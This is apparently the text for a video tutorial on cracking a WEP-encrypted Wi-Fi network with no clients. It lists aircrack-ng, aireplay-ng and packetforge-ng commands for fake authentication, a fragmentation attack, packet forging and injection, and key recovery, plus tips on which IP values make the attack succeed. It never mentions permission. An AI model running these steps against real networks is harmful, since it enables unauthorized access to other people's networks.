Video demonstration that shows how to crack a WEP encrypted network with no clients. This is conducted by utilizing aireplay-ng’s fragmentation attack, forging packets with packetforge-ng, and then injecting the forged packets into the network.
macchanger -s [wireless interface] (to discover the wireless card’s MAC address).
airmon-ng start [wireless interface] (start wireless card in monitor mode).
airodump-ng [wireless interface] (finds networks in range of your card).
airodump-ng -c [channel number] --bssid [access point MAC address] -w [outputfilename] [wireless interface] (begin capture file).
aireplay-ng -1 60 -a [AP MAC address] [wireless interface] (fake authentication attack every 60 seconds to avoid timeout).
aireplay-ng -5 -b [AP MAC address] -h [your MAC address] [wireless interface] (fragmentation attack to obtain PRGA/.xor file).
Packetforge-ng -0 -a [AP MAC address] -h [your MAC address] -l [source IP] -k [destination IP] -y [the .xor file] -w [outputforgedfilename] (to forge packet for injection attack).
aireplay-ng -2 -r [outputforgedfilename] [wireless interface] (to inject the forged packets).
aircrack-ng -0 [outputfilename.cap] (to decrypt WEP key).
The fragmentation attack is necessary to generate the .xor file we need for the packetforge step.
When doing the packetforge-ng step, the -l operation determines the source IP. If a known network IP address is used, then the more likely the attack will succeed. In addition, the -k operation determines the destination IP, and the attack will more likely succeed if an IP address that is not in use on the network is selected. In most cases, you are safe to use an IP address that ends in .255 for the -k operation.
The aireplay-ng -2 attack allows you to inject a specific file into the network. If you are attacking a network that you have previously injected packets to successfully, you may inject the same packet into the network by using aireplay-ng -2 -r [filename].
During the decryption phase of the attack, the -0 in aircrack-ng only outputs data onto a colorful terminal and is completely optional.
In some cases, a router’s settings may have stronger security, and will not allow you to maintain your fake authentication. If this is the case, you will need to use a different method to attack the network.